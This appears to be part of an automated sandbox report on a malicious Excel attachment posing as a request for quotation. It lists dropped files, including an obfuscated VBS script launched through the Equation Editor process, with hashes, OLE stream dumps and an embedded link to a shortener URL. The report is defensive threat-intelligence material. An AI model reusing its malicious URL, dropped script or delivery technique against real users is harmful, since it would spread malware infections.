                                                                      File Type:MS Windows 95 Internet shortcut text (URL=<https://zhort.de/>), ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):43
                                                                      Entropy (8bit):4.340891860212397
                                                                      Encrypted:false
                                                                      SSDEEP:3:HRAbABGQYm2fzD:HRYFVm4H
                                                                      MD5:7B430E77026D35F4B4E760DB85B70575
                                                                      SHA1:13125F9685E08DC3EB0D20E9EEA8092E8BC052ED
                                                                      SHA-256:8BEF7BE05D45AE0CCA841BBF85E3FF266942452379B166A211213680FBDDD012
                                                                      SHA-512:C733F156EECC928A2557044D5D5490DE9653B0EFD8C68F96AA81B4BB6E333C81BBAAA573C09B47C5B0AEBDDEF122D6A1EB4BE3E0F6E7C92FE95D1309F3AAC418
                                                                      Malicious:true
                                                                      Preview:[InternetShortcut]..URL=https://zhort.de/..

                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):162
                                                                      Entropy (8bit):2.503835550707525
                                                                      Encrypted:false
                                                                      SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                                                                      MD5:CB3D0F9D3F7204AF5670A294AB575B37
                                                                      SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                                                                      SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
                                                                      SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
                                                                      Malicious:false
                                                                      Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                      C:\Users\user\AppData\Roaming\sweetbuttersmoothbananaherefor.vBs

                                                                      Download File
                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):183474
                                                                      Entropy (8bit):3.8646231642419524
                                                                      Encrypted:false
                                                                      SSDEEP:1536:WJNuBK2J+KxCPpyHa6XgeeLgt5pzeyGw9HkJm4Ortmf3J2GtLRENhc8kVNYYN3I2:oEK2VsAggt5phGw9SCLEVwixi79UeUf
                                                                      MD5:A285D18480C6F6CC2D261CDE7354D19D
                                                                      SHA1:D44C64C965E46B6AB12BD418F07E671A50E74CA2
                                                                      SHA-256:6FE6D465B7B4E666A8B8AF9B0CE9BB28B731E097384F26C2E2C1376FB21F904A
                                                                      SHA-512:42BCDDFF6189953F0412D967E22DC8ACADAF1C64FB9D9FC868BCB21F097AC13ADB0C6FC6100375B6C94FD8F0022B63300F9A3BD029602D29E493DFD13C23F1C6
                                                                      Malicious:true
                                                                      Preview:......d.L.I.c.i.c.J.f.h.G. .=. .".q.z.L.W.G.G.W.S.L.L.".....c.m.p.L.L.A.f.P.G.s. .=. .".p.C.e.L.T.J.G.R.n.B.".....n.l.f.K.h.k.T.W.K.T. .=. .".z.C.L.m.P.J.A.o.m.x.".....A.N.C.j.G.q.j.i.W.W. .=. .".h.x.W.c.W.m.K.k.m.z.".....L.W.U.L.W.N.i.a.A.l. .=. .".K.z.i.U.L.i.g.r.k.z.".....k.A.e.k.G.m.b.k.B.f. .=. .".A.L.Z.z.n.A.W.O.B.d.".....b.h.d.f.A.H.m.g.p.L. .=. .".U.u.u.K.W.z.i.i.o.C.".........B.C.H.L.N.P.t.z.Z.L. .=. .".e.d.K.N.A.z.i.K.A.C.".....U.z.Z.G.L.G.p.o.U.f. .=. .".l.q.b.m.e.l.s.q.a.G.".....A.c.N.f.q.o.k.j.b.d. .=. .".W.o.U.U.W.K.I.W.K.K.".....k.z.L.v.i.k.u.W.G.j. .=. .".i.L.i.c.C.u.K.Z.T.Q.".....G.m.J.e.N.W.q.A.a.U. .=. .".C.z.G.L.f.o.c.G.W.L.".....K.m.L.e.s.N.o.z.U.v. .=. .".W.h.e.N.s.q.U.Z.i.c.".....S.m.N.z.k.q.L.v.H.G. .=. .".T.p.m.j.k.A.g.W.U.L.".....N.m.m.z.A.R.l.K.i.a. .=. .".N.Z.P.e.R.H.c.d.l.c.".....g.L.m.n.K.G.K.s.N.K. .=. .".a.h.q.O.n.A.n.a.u.q.".....i.r.O.l.L.N.z.W.e.P. .=. .".s.G.b.i.o.L.L.t.W.z.".........L.U.Q.K.k.T.K.U.L.o. .=. .".o.Z.L.n.i.U.Q.L.O.H.".....B.c.c.W.d.n.e.

                                                                      C:\Users\user\Desktop\9EC30000

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 05:54:25 2024, Security: 1
                                                                      Category:dropped
                                                                      Size (bytes):575488
                                                                      Entropy (8bit):7.9821275937940515
                                                                      Encrypted:false
                                                                      SSDEEP:12288:P+/zTAzN8oILs6XyBASpUoVs/w5lx04xY5xDGz1Rx3/RZkDEgjO7:PuzTwNTILRX8OoVsI/xyDGz1R5RJW
                                                                      MD5:592FEB49BA2875E91F13670B964AD15B
                                                                      SHA1:C842C3530E8F40AA6B56D8D2DB8DAF6489720288
                                                                      SHA-256:C830403D175EAE51D045B0A4C6F04FB88D44AABE4AE904B4CE95F5F94E7DB151
                                                                      SHA-512:82CEB491AC902F248002BEB3EE8769AF60F2C45AACE45DC08AFFEF0FAA21B1EBB885C7B88BA8A5580532884991D2F02458EC7C20A63D241F1707282A62888CC1
                                                                      Malicious:false
                                                                      Preview:......................>...................................)...................k.......m.......o.......q...............................................................................................................................................................................................................................................................................................................................................................................................................................b................................................................................................................... ...!..."...#...$...%...&...'...(...........a...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...l.......m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                      C:\Users\user\Desktop\9EC30000:Zone.Identifier

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):26
                                                                      Entropy (8bit):3.95006375643621
                                                                      Encrypted:false
                                                                      SSDEEP:3:ggPYV:rPYV
                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                      Malicious:false
                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                      C:\Users\user\Desktop\RFQ No. 109078906v.xla.xls (copy)

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Aug 28 05:54:25 2024, Security: 1
                                                                      Category:dropped
                                                                      Size (bytes):575488
                                                                      Entropy (8bit):7.9821275937940515
                                                                      Encrypted:false
                                                                      SSDEEP:12288:P+/zTAzN8oILs6XyBASpUoVs/w5lx04xY5xDGz1Rx3/RZkDEgjO7:PuzTwNTILRX8OoVsI/xyDGz1R5RJW
                                                                      MD5:592FEB49BA2875E91F13670B964AD15B
                                                                      SHA1:C842C3530E8F40AA6B56D8D2DB8DAF6489720288
                                                                      SHA-256:C830403D175EAE51D045B0A4C6F04FB88D44AABE4AE904B4CE95F5F94E7DB151
                                                                      SHA-512:82CEB491AC902F248002BEB3EE8769AF60F2C45AACE45DC08AFFEF0FAA21B1EBB885C7B88BA8A5580532884991D2F02458EC7C20A63D241F1707282A62888CC1
                                                                      Malicious:false
                                                                      Preview:......................>...................................)...................k.......m.......o.......q...............................................................................................................................................................................................................................................................................................................................................................................................................................b................................................................................................................... ...!..."...#...$...%...&...'...(...........a...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...l.......m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                      C:\Users\user\Desktop\~$RFQ No. 109078906v.xla.xlsx

                                                                      Download File
                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                      File Type:data
                                                                      Category:modified
                                                                      Size (bytes):165
                                                                      Entropy (8bit):1.4377382811115937
                                                                      Encrypted:false
                                                                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                                      MD5:797869BB881CFBCDAC2064F92B26E46F
                                                                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                                      Malicious:true
                                                                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                      Static File Info

                                                                      General

                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Aug 27 15:53:22 2024, Security: 1
                                                                      Entropy (8bit):7.961080273486884
                                                                      TrID:
                                                                      • Microsoft Excel sheet (30009/1) 47.99%
                                                                      • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                      File name:RFQ No. 109078906v.xla.xlsx
                                                                      File size:568'832 bytes
                                                                      MD5:7d6c11d30d7322951af23907572b81ea
                                                                      SHA1:e48456f2059d8eeaf2b9a2788cbe53b160dbfc3c
                                                                      SHA256:7d919f1cc55ce5ee6cdd40968757296e07038d7cb676205d77bacff65baa672a
                                                                      SHA512:62b21f1d2f8f76484f71a54f63ca196a938387c4d9326c2d56f36b4a12a768228ea4e66d798700a64b125f9af4d8c3feeb4fed9b754c61199fd2003852e91e6f
                                                                      SSDEEP:12288:X+a2GbfPRQaJGEcTP7A9DHHCWoJX5WOJ//Cz6BAiZ3IHV:XlddJDcTPk9jCWw5Bb4HV
                                                                      TLSH:94C4232C32CAEF0BD68B08394DDC695B1FD5AD995F61C85332A637AF2C306E24291C57
                                                                      File Content Preview:........................>...................................)...................k.......m.......o.......q......................................................................................................................................................

                                                                      File Icon

                                                                      Icon Hash:2562ab89a7b7bfbf

                                                                      Static OLE Info

                                                                      General

                                                                      Document Type:OLE
                                                                      Number of OLE Files:1

                                                                      OLE File "RFQ No. 109078906v.xla.xlsx"

                                                                      Indicators
                                                                      Has Summary Info:
                                                                      Application Name:Microsoft Excel
                                                                      Encrypted Document:True
                                                                      Contains Word Document Stream:False
                                                                      Contains Workbook/Book Stream:True
                                                                      Contains PowerPoint Document Stream:False
                                                                      Contains Visio Document Stream:False
                                                                      Contains ObjectPool Stream:False
                                                                      Flash Objects Count:0
                                                                      Contains VBA Macros:True
                                                                      Summary
                                                                      Code Page:1252
                                                                      Author:
                                                                      Last Saved By:
                                                                      Create Time:2006-09-16 00:00:00
                                                                      Last Saved Time:2024-08-27 14:53:22
                                                                      Creating Application:Microsoft Excel
                                                                      Security:1
                                                                      Document Summary
                                                                      Document Code Page:1252
                                                                      Thumbnail Scaling Desired:False
                                                                      Contains Dirty Links:False
                                                                      Shared Document:False
                                                                      Changed Hyperlinks:False
                                                                      Application Version:786432

                                                                      Streams with VBA

                                                                      VBA File Name: Sheet1.cls, Stream Size: 977
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                      VBA File Name:Sheet1.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 0d 11 42 8b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      VBA Code
                                                                      Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                      VBA File Name: Sheet2.cls, Stream Size: 977
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                      VBA File Name:Sheet2.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 0d 11 1a 4a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      VBA Code
                                                                      Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                      VBA File Name: Sheet3.cls, Stream Size: 977
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                      VBA File Name:Sheet3.cls
                                                                      Stream Size:977
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 0d 11 d0 1d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      VBA Code
                                                                      Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                      VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                      VBA File Name:ThisWorkbook.cls
                                                                      Stream Size:985
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 0d 11 c3 32 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      VBA Code
                                                                      Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                      Streams

                                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                      General
                                                                      Stream Path:\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:114
                                                                      Entropy:4.25248375192737
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                      General
                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:244
                                                                      Entropy:2.889430592781307
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                      General
                                                                      Stream Path:\x5SummaryInformation
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:200
                                                                      Entropy:3.2503503175049815
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . . . . . . . . . . .
                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                      Stream Path: MBD000E9660/\x1CompObj, File Type: data, Stream Size: 99
                                                                      General
                                                                      Stream Path:MBD000E9660/\x1CompObj
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:99
                                                                      Entropy:3.631242196770981
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: MBD000E9660/Package, File Type: Microsoft Excel 2007+, Stream Size: 19363
                                                                      General
                                                                      Stream Path:MBD000E9660/Package
                                                                      CLSID:
                                                                      File Type:Microsoft Excel 2007+
                                                                      Stream Size:19363
                                                                      Entropy:7.65458028132816
                                                                      Base64 Encoded:True
                                                                      Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                      Stream Path: MBD000E9661/\x1Ole, File Type: data, Stream Size: 358
                                                                      General
                                                                      Stream Path:MBD000E9661/\x1Ole
                                                                      CLSID:
                                                                      File Type:data
                                                                      Stream Size:358
                                                                      Entropy:5.709450368788717
                                                                      Base64 Encoded:False
                                                                      Data ASCII:. . . . u 1 C 7 M . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . z . h . o . r . t . . . d . e . / . F . o . N . V . g . 0 . . . . . ) . [ X m . F . K a . % . . f . I D 1 V a _ 5 " w * . . G T . - x Q E p k S . t b # L . i $ . $ . # [ 2 " . . G n . . . . . . . . . . . . . . . . Z . . . 1 . d . L . i . q . W . k . E . V . y . w . x . C . B . d . w . 9 . U . E . r . O . C . P . L . 3 . e . y . j . H . x . D . 3 . b . y . J . 5 . n . U . K . a . d . 3 . q . a . . . F 0 = ^ u
                                                                      Data Raw:01 00 00 02 75 cd cf 31 43 37 9f 4d 00 00 00 00 00 00 00 00 00 00 00 00 ac 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b a8 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 7a 00 68 00 6f 00 72 00 74 00 2e 00 64 00 65 00 2f 00 46 00 6f 00 4e 00 56 00 67 00 30 00 00 00 a2 8e 9e 00 cf 9a 29 15 a1 89 5b f6 ad 58 6d d8 19 81 46 11 e0 4b c3 61 13 f8 f7 25 15 14 66 a5
                                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 531023
                                                                      General
                                                                      Stream Path:Workbook
                                                                      CLSID:
                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                      Stream Size:531023
                                                                      Entropy:7.999346496346448
                                                                      Base64 Encoded:True
                                                                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . r g \\ . ) : . D O . 9 ` ( . < p T M _ & M O n n . J k . . . . . . . . . . } . . . \\ . p . . . . B . . . @ . 9 W " m x O G G . . L . p . % l @ 2 V E 6 M _ k ~ . & n G s J C p ^ . - . | U # . } . . c 0 Z ~ B . . . A a . . . r 4 . . . = . . . T # . X . . . ` : . x e l F * X . . . & . . . . c . . . . . . . . : c . . . . . . . d = . . . y z ; y ) 7 . N $ . . @ . . . " . . . " . . . A . . . . . . . . 1 . . . R . 1 . . . $ > . c F K _ 3 O E I . . d U 1 . .
                                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 b6 72 cd 67 bd 94 5c 00 29 3a ac d8 d0 b3 ef 9f f0 44 4f 13 39 60 28 dd 1d d4 3c 70 aa 54 4d 5f b6 db c0 eb 26 4d 4f bf 6e fb 6e 17 4a 6b bb b5 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 7d ff e2 00 00 00 5c 00 70 00 09 aa 8e 7f 03 c6 fc db f0 99 b8 42 01 f4 06 10 99 40 11 39 57 b5 22 6d eb 81
                                                                      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 529
                                                                      General
                                                                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                                      CLSID:
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Stream Size:529
                                                                      Entropy:5.299837638805839
                                                                      Base64 Encoded:True
                                                                      Data ASCII:I D = " { A 8 7 7 8 4 7 1 - 0 8 2 2 - 4 4 F 1 - A 8 9 C - 1 A A C C 4 6 F 5 3 3 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A A A 8 1 4 9 B 1 5 9 F 1 5 9 F 1
